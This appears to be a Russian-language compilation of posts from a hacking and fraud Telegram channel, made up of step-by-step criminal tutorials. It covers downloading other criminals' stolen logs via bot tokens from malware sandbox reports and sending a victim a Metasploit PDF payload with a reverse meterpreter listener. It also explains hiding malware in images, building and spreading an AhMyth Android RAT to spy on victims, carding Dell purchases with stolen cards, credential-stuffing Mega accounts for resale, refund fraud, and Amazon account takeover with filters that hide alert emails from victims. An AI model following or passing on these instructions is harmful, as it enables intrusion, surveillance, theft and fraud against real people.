Stenford

Получаем чужие логи бесплатно

2026-01-02T14:20:51.087Z

Драсте, сегодня расскажу вам, как можно красть логи из-под рук неопытных мошенников. Материал очень интересный, так что рекомендую к прочтению.

В общем, есть такой сайт — any run. Это что-то вроде VirusTotal: сюда можно загружать файлы на проверку (например найдение вами билды в интернете). В данном случае мы будем обрабатывать уже готовые файлы.

Вбиваем на сайте в поиске «telegram» — и нам открывается довольно интересная картина

𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

Всё эти — чьи-то билды, мы и будем их «тибзить». Выбираем первый файл и нажимаем на него, после чего кликаем на кнопку «Text report».

𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

Листаем ниже до «Malware configuration» и видем интересную картину

𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

Здесь есть и Telegram-токен, и chat ID. Зная это, можно скачать всё, что есть в боте.

А как же мы будем «выкачивать» ботов?
Всё просто недавно на GitHub появилась такая программа, как matkap.

Она позволяет пересылать все сообщения из Telegram-бота, зная его логин и chat ID.

Также есть возможность искать токены через URLScan и FOFA.

𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

Устанавливаем matkap по инструкции с Гит Хаба и возвращаемся к нашему токену.

Поскольку на Аny.run обычно загружают трояны, скорее всего тут мы и найдем логи.

И действительно — в боте мы получаем tdata.

𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

Выкачиваем её — и вуаля, вы великолепны 🎉
После можем проверить другие токены, продать либо отработать логи.

Больше сливов и авторских статей тут👉𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

Как взломать Android смартфон через .PDF файл

2024-06-30T18:52:42.734Z

Простейшая атака, которую ты сможешь повторить даже не имея компьютера.

Всем салют, дорогие друзья,
эта статья посвящена взлому Android смартфона с помощью PDF-файла.

Для проведения данной атаки можно использовать не только компьютер с установленным Linux, но и свой Android смартфон (вам понадобится установить Termux).

Сейчас расскажем все подробнее...

Вам понадобится:

Приложение Termux (загрузите его из Play Store или F-Droid).
Установить Metasploit Framework в Termux.
Termux должен иметь возможность использовать внешнее хранилище (для этого введите команду: termux-setup-storage).
(Рекомендуется, но не обязательно) Установите клавиатуру Hacker's Keyboard для легкого ввода команд в Termux.

После того, как вcе описанное выше - выполнено, можно приступать к взлому.

Запуск консоли Metasploit

Откройте Termux, если используете свой смартфон, или терминал, если используется компьютер с Linux.
Введите следующую команду, чтобы открыть консоль Metasploit

msfconsole

Если вы видите экран, как на скрине ниже, то все хорошо:

𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

Создание PDF-файла (Полезная нагрузка)

Введите команду, приведенную ниже:

use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs

Затем вы должны настроить Localhost. Для этого вам понадобится ваш IP-адрес, чтобы проверить его тип, вводите в новом окне session на termux или в другом окне терминала:

ifconfig

Теперь зайдите в свою консоль metasploit и вбейте свой IP следующим образом:

set LHOST [Ваш IP]

Замените IP-адрес, указанный в приведенной выше команде, вашим собственным IP-адресом

Теперь пришло время для настройки порта. Для этого введите следующую команду:

set LPORT 4444

Вы можете использовать любой порт, например 4564, 8080 и т.д.

Далее мы сгенерируем наш PDF файл с помощью команды ниже:

set filename Example.pdf

Закончим процесс создания, введя команду:

exploit

Теперь в течение секунды появится сообщение о том, что ваш PDF-файл создан.
Остается отправить этот файл своей жертве. Как только она его откроет, вы получите сеанс metasploit.

Использование

Сначала откройте консоль metasploit, набрав:

msfconsole

А затем впишите команды:

use exploit/multi/handler/ set LHOST <your_IP> set LPORT 4444 exploit

Убедитесь, что вы ввели тот же IP-адрес и порт, что и выше, во 2-м шаге.

Пройдет немного времени, после чего вы получите сеанс meterpreter.
Поздравляю! Вы получили доступ к смартфону жертвы и можете делать с ним все, что душе угодно.

На сегодня это все. Удачной охоты!

Больше сливов тут👉𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

Как спрятать вирус в картинку 📃

2024-06-26T18:14:52.547Z

Всем привет, дорогие друзья!
Сегодня мы расскажем о простом способе спрятать ваш вирус в картинку. Уверены, что данная статья будет полезна большинству новичков.

Ссылка на GitHub: https://github.com/bytecode77/pe-union

Открываем программу, нажимаем Tools -> Right to Left Override:

𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

Жмем на Browse и выбираем .exe файл нашего вируса, теперь нам надо заменить картинку

На сегодня это все. Удачной охоты!

Больше сливов тут👉𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

УСТАНОВКА И НАСТРОЙКА NOX ПОД ВБИВ!

2024-06-19T18:46:20.376Z

𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

Nox — эмулятор android, который позволит нам установить приложение шопа / банка / конторы и сделать вбив. Для чего нужно заморачиваться с этим и зачем бить с эмулятора? Для того, чтобы понизить фрод шопа, так как с мобильных приложений + если выполнен вход через facebook или учетную запись google — фрод намного слабее чем с десктопного браузера.

Первым делом скачиваем и устанавливаем NOX на виртуальную VirtualBox, затем переходим к настройкам.

Нажимаем на шестеренку и во вкладке «основные» ставим root права и меняем язык устройства под язык той страны с которой будем работать.

Затем открываем вкладку «расширенные» и указываем количество ядер и озу для работы nox, а так же выбираем тип устройства и расширение экрана.

𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

Переходим во вкладку «свойства» и выбираем модель телефона (можно модель по умолчанию или само определяемый, где вы сами указываете нужную информацию), IMEI, а таке же вписываем номер КХ или дропа, так как приложения палят эту инфу.

После этого нужно выбрать лаунчер под модель устройства, которую мы выбрали перед этим, это обязательно, так как по дефолту стоит лаунчер NOX и это палевно. После того как он установился — нажимаем на кнопку «home».

Выбираем наш лаунчер, который будет использоваться как основной.

Теперь нам понадобится скачать и установить Titanium Backup. После запуска выскочит окно, где нам нужно дать root права данному приложению.

𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

После этого ищем из списка лаунчер NOX и удаляем его, так как он нам не понадобится.

Затем ищем и удаляем следующие google сервисы, которые палят нашу систему.

На выходе должно получится так:

Проверьте или вы точно снесли эти сервисы, так как это важно! Так же поставьте свои обои на рабочий стол, так как это тоже палится. Теперь настраиваем язык системы, часовой пояс под КХ и обязательно отключаем геопозицию.

Как подключиться к ssh туннелям на андроиде — можете посмотреть в этой статье: //cardernews.cc/ispolzovanie-ssh-tunnelej-na-android/, а так же более подробная настройка android устройства здесь.

Теперь переходим к так же важному моменту, к подмене dns. Можно использовать либо google dns под страну с которой будем работать или юзать из этого сайта public-dns.info.

Открываем настройки — Wi-Fi и зажимаем кнопкой на нашей сети, в появившемся окне нажимаем на «modify network».

𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

В поле «Ip settings» выбираем «Static» и в поле «dns1» вставляем ip нашего dns сервера.

На этом настройка завершена.

Больше сливов тут👉𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

ВБИВ DELL

2024-06-17T15:24:41.542Z

𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

Как получить (карту) ноутбук dell

ДЕЙСТВИЯ:

1- Купите сс и проверьте ее на валидность

*Убедитесь, что ваше местоположение - США. Если все в порядке, перейдите на сайт: www.dell4me.com или www.dell.com

выберите ваш товар (менее 450 БАКСОВ)

* Убедитесь, что товар есть в наличии, чтобы не было задержек или шансов на отмену заказа.

2- Нажмите "Добавить в корзину", затем "Оформить заказ", вам будет предложено зарегистрироваться как новый пользователь или войти в систему,

3- Введите имя и фамилию вашего дропа в качестве имени и фамилии аккаунта.

На странице регистрации укажите действительный адрес электронной почты и пароль.

4- Вы будете перенаправлены на страницу информации о доставке, вы найдете имя и фамилию.

*Примечание: Вам не нужно указывать действительный номер телефона для адреса доставки. Телефон для выставления счета также подходит для доставки!

5- Выберите самый быстрый способ доставки (Next Day Air). Также подойдет и 2 Day Air,

но убедитесь, что общая сумма не превышает 470-480 $

6- На странице выставления счета удалите сохраненную информацию о доставке. Затем добавьте информацию для выставления счета

Информация, которая должна быть такой же, как хранится в банке (убедитесь, что CC является 100% действительным) Наиболее

ВАЖНОЙ ЧАСТЬЮ ЗДЕСЬ ЯВЛЯЕТСЯ НОМЕР ТЕЛЕФОНА ДЛЯ ВЫСТАВЛЕНИЯ СЧЕТА, не для звонка владельцу карты, а для проверки информации в банке)

7- Не выбирайте лимит на странице выставления счетов (выберите: Без лимита)

Нажмите Отправить !!!

*Следуйте 1-му методу для заказа одного товара с 1 CС, вы получите 2 электронных письма после заказа (Dell Order Order).

электронных письма после заказа (Dell Order Acknowledgement - Dell Order Confirmation), как только вы получите второе письмо: Dell Order Confirmation

проверьте статус заказа через 10 - 30 минут, если вы увидите что-то вроде (In-Production

или Pre-Production ) Переходите к следующему шагу.

2- Сделайте еще один заказ, который не должен превышать 480 $

4- Повторите это столько раз, сколько позволяет лимит СС.

5- Не делайте никаких заказов, если статус предыдущего заказа не ("В производстве" или "Предпроизводство").

Pre-Production)

6- Если они заподозрят один из заказов, они отменят все заказы..

Вот и все, и приятного вам кардинга от DELL

Больше сливов тут👉𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

Автор:LFC☔️TEAM

Отработка Mega.nz

2024-05-03T14:41:14.105Z

Приветствую!
В этой статье я научу вас отрабатывать аккаунты Mega nz и получать с них деньги.

Что с этого можно получить?

Mega nz аккаунты с 2 TB/400 GB в облаке которые в Офф. магазине стоят 5-10$.

Что понадобится?

- Чекер аккаунтов Mega.nz, довольно таки медленный чекер, но он бесплатный.

- Url:Login:pass базы

- Сортер баз чтобы вытянуть нужный нам запрос, я использую самописанный сортер(ниже в тг).

- Python (В инсталлере ставим галочку на PATH to file).

Установка чекера Mega nz

Шаг 1: Качаем с GitHub чекер

Шаг 2: Распаковываем в удобное место.

С телеграм каналов качаем базы в формате txt, качаем много чтобы потом получить много запросов (Сохраняем в одну папку).

𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

Установка сортера баз

Шаг 1: Создайте папку где будет находится python скрипт.
Шаг 2: Переходим по ссылке и качаем python скрипт и кидаем его в созданную папку.

Отработка

Шаг 1: Запускаем сортер баз: Win+r пишем cmd и в командной строке вводим cd <путь к скрипту> после пишем python main.py.Шаг 2: Выбираем из списка 13 функцию и после вводим путь к папке с Url:Login:Pass базами.

Шаг 3: Вводим название txt файла из которого получаться Логины и пароли от Mega nz.Шаг 4: Вводим наш запрос mega nz и ждём пока всё закончится, делать как на скриншоте.

Шаг 5: В папке с базами у нас сохранился txt файл с нашим запросом, переименовываем его в combo.txt.Шаг 6: Открываем папку с чекером и вставляем туда наш txt файл (combo.txt).Шаг 7: Запускаем exe файл чекер.

𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

Шаг 8: Нажимаем пробел/enter после пишем. сколько будем использовать потоков (по дефолту 10).Шаг 9: Пишем название файла куда будут сохраняться рабочие аккаунты (без .txt!!).Шаг 10: Далее просто скипаем остальные настройки кнопкой пробел/enter, они нам не нужны.

Шаг 11: Ждём конца проверки аккаунтов и получаем наши рабочие аккаунты.

Шаг 12: В текстовом редакторе с поиском вписываем "Total Space: 2048.0GB" или "Total Space: 400.0GB" чтобы вручную всё не искать, он найдет в txt файле аккаунты с 2 ТБ/400 ГБ в облаке.

Шаг 13: Продаём аккаунты на маркетплейсах и получаем с этого деньги.

Автор:RendyVendy

Больше сливов тут👉𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

RAT для Android

2024-05-01T16:14:12.679Z

Термином RAT (Remote Access Tool) принято называть утилиты удаленного администрирования. Они могут использоваться в благих целях по своему прямому назначению, как, например, популярный TeamViewer, а могут устанавливаться хакерами в тайне от пользователя.

В подобных случаях RAT нередко расшифровывают как Remote Access Trojan, и прямой перевод английского слова rat — «крыса» — тут приходится как нельзя кстати.

Как создать RAT для Android

AhMyth RAT (Remote Access Trojan) — это приложение с открытым исходным кодом, в данный момент находится на стадии бета-версии. Инструмент ориентирован на пользователей ОС Windows, но на GitHub можно скачать исходники AhMyth и для Unix-подобных платформ(Linux).

Имейте ввиду, что распространение вирусов и вредоносных программ — незаконное действие и влечет за собой уголовную ответственность. Вся информация предоставлена исключительно в ознакомительных целях. Ни редакция сайта www.spy-soft.net, ни автор программы не призывают к использованию полученных знаний в практических целях и не несут ответственности за любой возможный вред, причиненный материалом статьи.

Программа для создания RAT для Android AhMyth состоит из двух компонентов.

Серверное приложение, с помощью которого можно управлять зараженным устройством и создавать файлы APK с вредоносным кодом. Создано оно на Electron framework — фреймворке, разработанном на площадке GitHub для создания простых графических приложений.
Клиентский APK, содержащий вредоносный код, который позволяет получить удаленный доступ к зараженному Андроид-устройству. То есть созданный APK-файл будет выполнять функции бэкдора.

Установка AhMyth RAT

Серверная часть устанавливается очень просто, тем более автор RAT-конструктора выложил в свободный доступ бинарники. Но при желании можно скомпилировать ее из исходников. В моем случае тесты проходили на компьютере с Windows 10.

Для работы утилиты необходима уставленная на компьютер виртуальная машина Java. Скачать ее можно с официального сайта Java. После этого надо скачать бинарники самой AhMyth. Их вы можете найти в официальном репозитории проекта на GitHub, вкладка Assets. Во время скачивании рекомендую вырубить антивирус, чтобы его не хватил приступ от происходящего.

Создание зараженного APK

Чтобы создать файл APK для Android, откройте вкладку APK Builder. Внешний вид конструктора для создания RAT для Android показан ниже:

𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

Пользоваться конструктором AhMyth RAT очень легко. В окне Source IP надо ввести IP-адрес атакующей машины (этот адрес потом легко вычисляется \ при криминалистическом анализе вредоноса). В поле Source Port можно указать порт, который будет зарезервирован машиной для прослушивания подключений. По умолчанию используется порт 42 474.

Есть также опция Bind With Another Apk, которая позволяет склеить APK-файл с другим приложением.

Для этого надо отметить флажок Bind With Another Apk, выбрать необходимый APK и указать метод интеграции вредоноса в телефон. Есть два метода: при запуске зараженного APK или при перезагрузке телефона после установки RAT. Авторы программы рекомендуют второй вариант.

Осталось нажать кнопку Build — по умолчанию зараженный файл сохраняется в папку:

<strong>C:\Users\<Your_Username>\AhMyth\Output</strong>

Распространение RAT для Android

Как распространяются собранные таким методом вредоносы — это отдельная тема для дискуссий. Отмечу только, что в Google Play регулярно обнаруживают зараженные RAT программы и столь же регулярно их оттуда выпиливают, что не мешает малвари появляться в этом каталоге снова. Кроме того, методы социальной инженерии никто не отменял. Но имейте ввиду, что для активации RAT после установки приложения обязательно нужно запустить или перезагрузить зараженное устройство (в зависимости от настроек билдера).

Для успеха также требуется, чтобы в настройках целевого устройства был отключен параметр «Установка только из доверенных источников».

Соединение с зараженным устройством

Теперь нужно перейти во вкладку Victims и вбить в поле тот же порт, что мы указывали раньше, чтобы сервер ждал подключений от зараженных устройств. Опять же если вы ничего не меняли при сборке APK, то ничего не надо указывать и здесь.

Нажимаем на Listen, и, если наш APK успешно заразил мобильное устройство, мы увидим новое подключение.

Программа также логирует все действия в консоли, расположенной в нижней части окна. Значения колонок журнала в целом очевидны.

Country — страна, в которой работает зараженное устройство.
Manuf — компания — изготовитель девайса.
Model — код или название модели устройства.
Release — версия операционной системы зараженного девайса (в моем случае это Android 10).
IP — IP-адрес устройства, а Port — порт, через который инфицированный девайс подключился к атакующей машине.

Теперь пора переходить к активным действиям — для этого смело нажимаем на кнопку Open The Lab.

Использование RAT AhMyth

Нашему вниманию будет предложено меню из семи пунктов, которое открывает доступ к разным функциям программы.

Камера

Для начала заглянем в раздел Camera. Выберите камеру: фронталку (Front) или основную (Back) — и можете сделать снимок нажатием на кнопку Snap. Правда, у меня почему-то не получилось толком сфотографировать, хотя все мои камеры на устройстве были успешно инициализированы.

Файловый менеджер

Файловый менеджер здесь не такой продвинутый, как в других RAT для Андроид и Windows, однако все равно это очень полезная вещь. С его помощью можно как минимум скачивать нужные нам файлы с зараженного устройства. Как видите, начальная директория — это корневой каталог, к которому есть доступ только с правами администратора.

Микрофон

Эта функция позволяет использовать микрофон устройства в фоновом режиме и записать все, что «слышит» телефон в течение указанного времени (в окне Seconds нужно числом задать продолжительность записи в секундах). Далее жмем Record и ждем. Полученный файл можно прослушать прямо в окне программы или сохранить себе на машину.

Геопозиция

На мой взгляд, это самая интересная возможность AhMyth. Если на инфицированном устройстве включена передача геоданных, вы сможете узнать геопозицию человека с точностью до десяти метров. Известно, что неопытные пользователи очень редко вспоминают об этом параметре и оставляют его включенным. Плюс некоторые приложения (те же карты), использующие передачу геоданных, когда-нибудь да заставят человека включить эту функцию.

Контакты

С помощью этой функции можно вытащить весь список контактов, которые записаны в телефоне. Есть возможность скачать весь список контактов себе на машину.

SMS

Еще один очень любопытный раздел. С его помощью можно отправить кому-то SMS или просмотреть и скачать все сообщения, которые пришли на это устройство.

Чтобы отправить SMS, перейдите на вкладку Send SMS, укажите номер телефона получателя (поле TO://), а в поле Message введите желаемый текст сообщения. После этого останется только нажать на кнопку SEND.

Эта функция может быть использована для сброса паролей учетных записей владельца зараженного устройства, например, для взлома «Вконтакте» или Instagram.

Журнал вызовов

Этот раздел дает возможность просмотреть список телефонных вызовов. Тут представлено четыре блока информации о каждом вызове: номер, с которым связывалось зараженное устройство; название контакта, к которому привязан этот номер на зараженном устройстве; время длительности вызова (в секундах); тип вызова (входящий или исходящий).

Как защититься от RAT на Андроид?

Как бы банально это ни звучало, никогда не давайте свой телефон в чужие руки и не устанавливайте сомнительные приложения. На самом деле это практически единственный способ обеспечить собственную безопасность и защититься от RAT на Android. И конечно же, всегда обращайте внимание на предупреждения системы о возможном вреде, который может причинить устройству скачанное приложение.

Заключение

Надеюсь, что вы будете использовать утилиту AhMyth RAT только в исследовательских целях на своих личных устройствах. Не забывайте: «Чем больше сила, тем больше и ответственность»!

Больше сливов тут👉𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

Автор:InfoBlac

Рефаунд Adidas 📦

2024-04-29T13:23:16.814Z

Рад приветствовать всех читателей данной статьи, здесь написал небольшую схему по рефаунду Adidas продукции, в свою очередь хочу попросить вас поддержать наш канал 🔥 и поделиться каналом с другом 📲

Основные нюансы 👇

• Лимит заказа на Adidas 400$ (ПОСЛЕ 400$ РИСКИ РАЗДЕЛЕНИЯ ЗАКАЗА)

• ОПЛАТА ОБЯЗАТЕЛЬНО ЧЕРЕЗ PAYPAL (в случае неодобрения поддержкой • Adidas придется запросить рефунд через поддержку PayPal)

• НЕ ЗАБУДЬТЕ ПРОГРЕТЬ КУКИ ДО 4 ДНЕЙ!!! (Можете просматривать товары на Adidas, лайкать их или добавлять в корзину)

Adidas Reb

REB - это когда в посылке что-то отсутствует, например, вы заказали три футболки, но утверждаете, что заказывали только одну.

📦 Получив посылку, через час или два мы можем написать в поддержку, выражая свое недовольство частичной поставкой (из трех товаров пришла только одна позиция). В поддержке могут попросить отправить товар, который, по вашему утверждению, пришел один, или даже не просить отправлять товар. После проведения расследования, которое может быть как быстрым, так и долгим, в зависимости от обстоятельств и вашей предварительной активности, они свяжутся с вами и предоставят возврат, возможно, вместе с промокодом на скидку!

Больше сливов тут👉𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

Вбив Амазона с логов

2024-04-27T10:46:28.162Z

Для начала тебе понадобится лог с аккаунтом Amazon'а. У большинства продавцов мата есть выборка по линкам, то есть можно купить логи именно под твой запрос, например, тот же Amazon.

Приступим к работе.

Настраивай свою систему под КХ, используя для этих целей сферу (можешь и не юзать сферу, просто с ней удобнее и быстрее), загружай куки с лога и первым делом заходи на почту КХ. Советую всегда переходить в шоп по ссылке из мыла, так наберешь меньше очков фрода, а это тебе только на руку. Рекламы амазон присылает очень много, поэтому найти письмо точно сможешь.

В службе безопасности компании такого уровня сидят не дураки. Парни там прекрасно понимают, что современные хакеры владеют кучей инструментов для реализации разного рода подмен, поэтому внимание будет концентрироваться на другом. Амазону очень важен хороший прогрев с чистого IP адреса, который бы не светился в блэклистах. Это я говорю к тому, что прокси желательно иметь максимально чистый, особенно на начальном этапе твоей карьеры. Подбирай адрес без блэклистов, чтобы потом не жаловаться на отмену и блокировки аккаунтов.

Безусловно, существуют счастливчики, которые вбивали на 5 000 $ с VPN, но пока у тебя нет опыта, не пытайся повторить их достижения. Только зря спустишь деньги и убьешь логи. Однако, опыт - лучший учитель.

Итак, вот ты зашел по ссылке из электронной почты на сайт амазона. Смотри в правый верхний угол. Если там ты видишь вот такое (см. картинку внизу), значит куки сработали не до конца. Не пугайся это нормально.

Не удалось попасть в аккаунт по кукам

Нажимай кнопку Sign In, перед тобой всплывет окно, в котором нужно ввести логин и пароль, эти данные должны быть в файлике с паролями из твоего лога. Пиши либо ручками, либо через PASTE LIKE HUMAN PRINT. Реально замечено, что именно амазону эта фишка нравится. Ставь галочку Keep me signed in. Если пароль правильный, куки свежие и всё хорошо, то страница обновится, и амазон поприветствует тебя.

Здесь часто бывает такое, что от тебя потребуется принять код верификации в электронную почту. Это значит, что пароль верный, но амазон хочет перестраховаться. Смело жми SEND CODE и получай код в электронную почту КХ, оттуда копируй и вставляй в поле для ввода.

ВАЖНАЯ ИНФОРМАЦИЯ

Чтобы КХ не спалил письма, приходящие по твоей вине, в почтах необходимо настраивать фильтры. Это очень важный момент, советую настраивать фильтр, по крайней мере на амазон как можно быстрее.

Например, в Gmail это делается так.

Нажимаешь на кнопку (стрелочка вниз) в панельке сверху.

Появится вот такое окно (см. картинку ниже), где тебе придется вписать критерии для фильтрации сообщений. В данном случае это слово "amazon", но аналогично делать можно и с "eBay" или банком "Chase" и вообще с чем угодно.

Здесь жмешь CREATE FILTER. Белую кнопку, не синюю!!

Затем, задаешь следующие настройки:

Всё. Таким образом, все письма будут падать сразу в корзину, в обход папки входящие. Push уведомления на смартфон в таком случае также не приходят. Круто, удобно, полезно. Всегда ставь фильтр на тот сервис, который собираешься нагибать. Ведь очень важно, чтобы КХ ничего не спалил, и ты сделал своё грязное дело чисто и качественно. Возьми себе это за правило, и чем раньше, тем лучше.

В других почтах это реализуется подобным образом, загугли и увидишь подробные мануалы, так что заострять на этом внимание не буду. Находи фильтр, настраивай его на ключевое слово, отлавливай из корзины письма для собственного употребления, а после прочтения и извлечения всей нужной информации сразу удаляй. Не оставляй их там, лучше заведи себе какой-либо файл с записями статистики и записывай все туда. Всегда перестраховывайся и подчищай следы своей деятельности.

Теперь к Amazon'у

У шопа интуитивно понятный интерфейс, да и ты не глупый раз читаешь наш канал, поэтому обойдемся без разбора интерфейса. Потыкайся сам, поизучай, только на пользу будет. Ранее я уже упомянул, что АФ амазона очень хорош, поэтому тебе нужно тщательно прогревать аккаунт. Для начала попробуй зайти в Orders, посмотри на активность КХ.

Возможно там будут ордеры, которые находятся в пути, возможно будут ордеры, которые еще даже не отправлены. Бывают ордеры, на которые оформлен возврат. Это показывает, что аккаунт живой. Бывает ордеров много, бывает мало, конечно, чем больше тем лучше, так как это подтверждает платежеспособность клиента, однако, в таком случае, возможно, КХ и сам часто заходит в аккаунт, либо имеет push уведомления в мобильном приложении амазон на своем телефоне. Короче говоря, количество ордеров - не показатель. Главное, чтобы они были.

Если тебя не пустило в ордеры без ввода пароля - АФ тебя еще не принял за своего, это плохо. Желательно добиться того, чтобы тебя пускало в ордеры КХ просто по кукам, которые ты уже нагулял (поэтому и нужен прогрев в пару дней).

Итак, обязательно заходи на товары, которые покупал КХ, смотри похожие товары из предложенных, гуляй по страницам, которые предлагает амазон. Не бросайся сразу к интересным товарам. Посмотри тот шлак, который брал себе КХ, посранивай цены, по возможности плавно переходи к интересующим тебя категориям.

Например, если КХ раньше заказывал фототехнику, разумно будет посмотреть фотоаппарат, если комплектующие к ПК, то, соответсвенно, их. Самое главное, не торопись, не жалей времени. Зайти на аккаунт написать в поиске iphone xs max и вбить 10 штук у тебя может и получится, но только вот аккаунт умрет, и доступ к нему будет потерян.

Идеальный прогрев - это когда ты заходишь на аккаунт несколько дней с одного IP. И занимаешься сравнением товаров, поиском самого подходящего именно для тебя. Поэтому при работе с амазоном разумно использовать SSH. Потому что прокси часто умирают, хотя и с ними тоже можно вполне успешно работать.

В амазоне разместить ордер можно с любого грязного IP без денег на карте, в обработку он поступает после размещения заказа. Именно в этот момент начинает работать большинство его антифрод алгоритмов. Короче, ордер - не показатель успешности вбива. А заказы попавшие под подозрение, амазон не просто отменяет, а блокирует такие аккаунты и вся платежная информация из них удаляется.

Поэтому крайне важно имитировать поведение реального американца, можно добавлять товары в Wish List, либо Shopping List. Оставлять отзывы на товары приобретенные холдером, что также снижает очки фрода и улучшает твою репутацию.

Добавляй товар в листы справа внизу:

𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

Например, на этом логе их достаточно много, это хорошо. Можно их заполнить, потом выбрать товар оттуда, и вбить. Например, сегодня ты остановился на PS4. До этого ты тщательно изучил товары, которые покупал КХ, пересмотрел кучу всякого барахла, и решил, что PS4 - твой выбор. Она полежала пару дней в одном из листов, а ты заходил в акк с одного IP и снова любовался PS4, сравнивал ее с иксбоксом, нинтедно свитч, ну ты меня понял. Ты прогревал аккаунт.

Для вбива не подходят товары, у которых будет пометка PRIME, либо FULLFILMENT BY AMAZON.

Чтобы посмотреть всех продавцов, которые продают этот товар, нажимай на эту ссылку:

𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

Товары с PRIME, либо FULLFILMENT BY AMAZON будут отправлены курьерской службой амазона. Такой товар невозможно будет зарерутить, или сделать пикап.

ОБРАЩАЙ НА ЭТО ВНИМАНИЕ. ВСЕГДА!

Старайся выбирать мелких селлеров, с маленьким количеством отзывов и продаж. Такие шопы чаще шлют с помощью FedEx \ UPS, на которых можно сделать рерут. USPS, AMZL, LASERSHIP - не рерутятся.

Добавляй товар в корзину, переходи к оплате. Да, поначалу будет казаться, что это лотерея, но селлеров шлющих федексом сейчас много, он и рерутится легче всего. UPS поменьше. USPS на амазое встречается очень редко. Здесь продавцы реально бьются за своё имя и репутацию, поэтому шлют ответсвенными курьерками, которые не кладут на паки болт и отправляют достаточно быстро.
Скорость доставки советую ставить либо Expedited Shipping, либо Two Day Shipping. Самую быструю не используй, ее не развернуть в процессе доставки, за счет того, что это экспресс доставка.

Важный момент. Если всплывает вот такое окно, после того, как ты выбрал адрес доставки - смени его. Это значит, что на этот адрес, с этой выбранной тобой карты, еще не платили.

Если же у тебя есть номер карты, можешь попробовать добавить новый адрес, и подтвердить его по вводу номера СС, но не советую, особенно использовать адрес посреда.

Меняй адрес \ карту, пробуй разные комбинации, какая то должна сработать, ты это увидишь - поле для ввода номера карты пропадет.

Если у тебя есть номер карты, привязанной к аккаунту, стоит попробовать вбить egift. Для них в амазоне, в отличии от других шопов, требуется именно полный номер привязанной карты, тогда как большинство других шопов запросят cvv код, который очень редко встречается в логах.

Если обработка гифта проходит удачно, он упадет на почту в виде кода. Продавай этот код скупам, они знают что с ним делать.

Идем дальше.

Когда амазон выдаст тебе подтверждение ордера, нажимай кнопку view or edit order и возьми оттуда шиппинг адрес, номер заказа и название продавца, у которого ты сделал покупку. Бывает такое, что аккаунт умирает, когда пак уже в пути, поэтому используй эти данные для его отслеживания. По ссылке, которая придет на почту КХ можно также отслеживать заказ, даже не заходя на аккаунт. Т.е. даже если КХ сменит пароль, ты сможешь отследить движение заказа. Достаточно удобно и полезно.

ВАЖНЫЙ МОМЕНТ

Когда заказ перейдет в финальную стадию, амазон попробует списать у КХ с карты сумму, на которую был сделан заказ. Если оплата пройдет успешно, то ты просто получишь уведомление, о том, что твой заказ отправлен.

Если у КХ на карте не хватает денег, либо карта уже закрыта, заблокированна, либо что-то еще, ты увидишь ошибку, указанную на скриншоте ниже. Ошибка как приходит на почту, так и отображается в аккаунте амазона.

𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

Итак, порядок действий по работе с амазон:

Еще пару советов.

Если на почту падает письмо от амазон, содержащее слова account alert, значит что ты не прошел АФ, где-то проебался, и тебя вычислили. Очень прискорбно, но аккаунт в таком случае умирает.

